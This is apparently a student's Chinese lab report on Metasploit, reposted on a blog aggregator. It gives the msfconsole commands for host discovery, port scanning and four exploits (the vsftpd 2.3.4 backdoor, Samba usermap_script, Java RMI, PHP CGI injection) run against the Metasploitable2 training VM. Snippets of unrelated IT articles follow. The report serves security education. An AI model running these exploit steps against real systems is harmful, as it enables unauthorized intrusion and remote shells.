20222312 2024-2025-1 《网络与系统攻防技术》实验六实验报告

news/2024/11/17 12:42:57/文章来源:https://www.cnblogs.com/20222312zhx/p/18550420

1.实验内容及要求

本实践目标是掌握metasploit的用法。

指导书参考Rapid7官网的指导教程。

https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

下载官方靶机Metasploitable2,完成下面实验内容。

(1)前期渗透

①主机发现(可用Aux中的arp_sweep,search一下就可以use)

②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。

③选做:也可以扫系统版本、漏洞等。

(2)Vsftpd源码包后门漏洞(21端口)

漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

利用步骤:

在kali中执行msfconsole 启动metasploit

use exploit/unix/ftp/vsftpd_234_backdoor 选择漏洞

set RHOST XX.xx.xx.xx 设置要攻击的机器IP(靶机IP)

exploit/run 开始攻击

利用成功
执行uname –a、 pwd、 id等命令 验证

(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

利用步骤:

use exploit/multi/samba/usermap_script 选择漏洞

set RHOST ip 设置要攻击的机器IP

exploit 开始攻击

利用成功 执行uname–a验证

(4)Java RMI SERVER命令执行漏洞(1099端口)

漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。

操作步骤:

首先查看1099端口是否打开。

然后在MSF中:
use exploit/multi/misc/java_rmi_server

show options 查看配置参数

set RHOST (靶机IP)

exploit/run

sessions -i id

shell (进入meterpreter时,使用whoami验证下)

(5)PHP CGI参数执行注入漏洞(80端口)

漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

在kali中执行msfconsole,启动metasploit

msf > use exploit/multi/http/php_cgi_arg_injection 选择漏洞

set RHOST ip 设置要攻击的机器IP

exploit/run 开始攻击

2.实验过程
2.1前期渗透
2.1.1主机发现
查询虚拟机ip

查询主机ip

主机和虚拟机执行ping命令

2.实验过程
2.1 前期渗透
2.1.1 主机发现(可用Aux中的arp_sweep,search一下就可以use)
search arp_sweep
use 0
set RHOSTS 192.168.1.0/24
set THREADS 30 run

成功查询到靶机(192.168.1.114)
2.1.2 端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等
search portscan/tcp
set ROHSTS 192.168.1.114
run

成功扫描出tcp端口。
2.1.3 扫描系统版本、漏洞

search auxiliary/scanner/smb/smb_version
use 0
set RHOSTS 192.168.1.114
run

目标主机运行的是一个较旧的 Samba 版本(3.0.20),且使用 SMBv1,可能存在一些已知漏洞。
2.2 Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
search exploit/unix/ftp/vsftpd_234_backdoor
use 0
set RHOST 192.168.1.114
run
run攻击成功执行后,再输入uname –a、 pwd、 id等命令 验证。

2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
search exploit/multi/samba/usermap_script
use 0
set RHOST 192.168.1.114
exploit

利用成功 执行uname –a验证

2.4 Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
search exploit/multi/misc/java_rmi_server
use 0
show options //查看配置参数
set RHOST 192.168.1.114
exploit
运行成功,输入sessions -i 3进入任务
再输入shell,利用whoami命令验证,得到结果root。

2.5 PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
search exploit/multi/http/php_cgi_arg_injection
use 0
set RHOST 192.168.1.114
Exploit
攻击成功,输入dir验证。

3.问题及解决方案
本次实验在虚拟机安装的时候出现了一些问题,发现是版本不兼容,更换vmware版本后可以正常执行

4.学习感悟、思考
在进行 Metasploit 渗透测试的实践后,我深刻感受到网络安全领域犹如一座充满未知陷阱和错综复杂的迷宫。通过这次实践,我认识到每个看似坚固的系统都有可能隐藏着被攻破的脆弱点,Metasploit 这样的强大工具,既是一柄锐利的剑,也是一块镜子。它让我们看到了攻击者如何利用各种手段,从信息收集、漏洞扫描、远程利用漏洞,到最终控制目标系统的完整流程,这一切的连贯性和简易性令人震撼。它提醒我们,在构建防御体系时,不容忽视任何一个环节,只有从全局出发,做到面面俱到,才能有效防范潜在的安全威胁。

但与此同时,这次实践也让我更加深刻地认识到道德责任的重要性。掌握如此强大的技术能力,如果不能正确引导使用,就有可能为恶意攻击者所用,给社会和他人带来不可预估的损害。正因为如此,作为网络安全从业者,我们不仅需要精湛的技术水平,更需要坚定的道德操守。我们要时刻警惕,避免技术能力被滥用,要将我们的知识和技能投入到保护信息资产的工作中,而不是利用它们去破坏或伤害他人。这种实践让我意识到,网络安全攻防背后的每一个决策、每一个行为,都涉及到人性、伦理和社会责任的深刻问题。

此外,网络安全的实践也让我更加认识到持续学习的必要性。随着技术和攻击手段的不断发展,新的漏洞、攻击技术层出不穷,作为网络安全从业者,我们必须时刻保持对新知识的敏感度,跟上时代的步伐,保持警觉,才能在不断变化的网络环境中,保持竞争力、保持领先,构筑起牢不可破的安全防线,守护好我们的数字世界。

这次的实践经历让我对网络安全有了更加全面和深刻的认识。在未来的职业生涯中,我将继续学习、反思并坚持正确的价值观,以技术为盾,以责任为剑,保护我们的网络环境和信息资产。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/835288.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

解决 PbootCMS 网站转移后无法打开报错提示“No input file specified”的问题

确保所有文件路径正确无误。检查 index.php 文件确保 index.php 文件存在于网站根目录中,并且路径正确。检查其他配置文件确保 config.php 和其他配置文件路径正确。查看错误日志 查看服务器日志,获取更多详细的错误信息。PHP 错误日志通常位于 /var/log/php7.x-fpm.log 或 /…

织梦dedecms无法登录后台,提示用户名或密码错误怎么办

问题描述:无法登录后台,提示用户名或密码错误。 解决方案:检查用户名和密码:确保输入的用户名和密码正确。 清除Cookie:清除浏览器的Cookie,重新尝试登录。 检查数据库:确保数据库中的管理员账户信息正确。 检查文件权限:确保后台目录和文件的权限设置正确。 检查配置文…

网站数据库如何修改config.php,如何在网站配置文件中修改数据库连接信息

修改网站的数据库连接信息可以确保网站能够正确连接到数据库。以下是具体步骤:备份文件:在修改前,备份当前的config.php文件,确保数据安全。 使用FTP工具(如FileZilla)下载config.php文件到本地。编辑文件:使用代码编辑器(如Sublime Text、Visual Studio Code)打开con…

修改公司网站 插件,如何在公司网站后台安装和管理插件

插件可以扩展网站的功能,提升用户体验。以下是具体步骤:登录后台:打开浏览器,输入网站的后台地址,例如 http://yourdomain.com/admin。 输入管理员账号和密码,点击“登录”。进入插件管理:登录后,点击顶部菜单栏中的“插件”或“扩展”。 选择“插件管理”或“扩展管理…

网站首页修改标题描述,如何在网站后台或代码编辑器中修改首页标题和描述

修改首页标题和描述可以提升搜索引擎优化(SEO)。以下是修改首页标题和描述的步骤:登录网站后台:打开浏览器,输入网站的后台地址,例如 http://yourdomain.com/admin。 输入管理员账号和密码,点击“登录”。进入SEO设置:登录后,点击顶部菜单栏中的“SEO”或“设置”。 选…

腾讯在线文档去掉底色

现在在线文档在单位使用范围比较广泛,前两天领导给我一个问题,在线文档标黄了部分文字,需要保留格式的情况下把底色去掉。当时在领导电脑上没解决,后面自己弄了个文档来测试解决了。分享给需要的人一个参考。 觉得过程麻烦的直接看最后解决方法,前面是过程。 1、在线文档导…

《计算机基础与程序设计》第九周

作业信息 这个作业属于哪个课程 <班级的链接>(如2024-2025-1-计算机基础与程序设计) 这个作业要求在哪里 <作业要求的链接>(如2024-2025-1计算机基础与程序设计第一周作业) 这个作业的目标 <写上具体方面> 作业正文 ... 本博客链接 教材学习内容总结 《计算…

Java面试之多线程并发篇(5)

前言 本来想着给自己放松一下,刷刷博客,突然被几道面试题难倒!常用的线程池有哪些?简述一下你对线程池的理解?Java程序是如何执行的?锁的优化机制了解吗?说说进程和线程的区别?似乎有点模糊了,那就大概看一下面试题吧。好记性不如烂键盘 *** 12万字的java面试题整理 *…

阿里面试:1000万级大表, 如何 加索引?

本文原文链接 文章很长,且持续更新,建议收藏起来,慢慢读!疯狂创客圈总目录 博客园版 为您奉上珍贵的学习资源 : 免费赠送 :《尼恩Java面试宝典》 持续更新+ 史上最全 + 面试必备 2000页+ 面试必备 + 大厂必备 +涨薪必备 免费赠送 :《尼恩技术圣经+高并发系列PDF》 ,帮你 …

团队项目4——项目冲刺-6

每日站立式会议昨天已完成的工作: 杨睿:处理页面跳转、错误状态处理等内容 开发物业报修页面木萨江:对接住户相关接口巴音才次克:完善住户个人资料页面李佳聪:测试住户相关接口今天计划完成的工作: 杨睿:完成住户物业报修页面木萨江:完成住户车位查询页面巴音才次克:对…

Codeforces Round 987 (Div. 2) - 比赛总结

Preface 我是若只。 A. Penchick and Modern Monument 先吃三发罚时。 最优策略应当是把所有数都调成众数,然而我一开始就忙着往后面做,胡乱猜了个结论就 WA 了,又猜了一个又 WA 了,再猜了一个再 WA 了。点击查看代码 const int N=105; int n,a[N];int main() {int T; read…

小米笔记本Pro15锐龙版(R7 5800H/15G RAM/512G SSD)拆机单固态硬盘SSD扩容,无损迁移Win11系统,测速对比

1. 准备工作 1.1 梅花头螺丝刀 2.72米 1.2 新的固态硬盘 三星980 nvme m2固态硬盘,官方说读取速度能到3.5G,实测能到3.3G。 小米笔记本Pro15锐龙版的M.2插槽支持的是PCIE 3.0, 三星980支持的就是PCIE 3.0,够用了。 三星980 Pro支持的是PCIE 4.0,读取能到7G,但接口不支持,…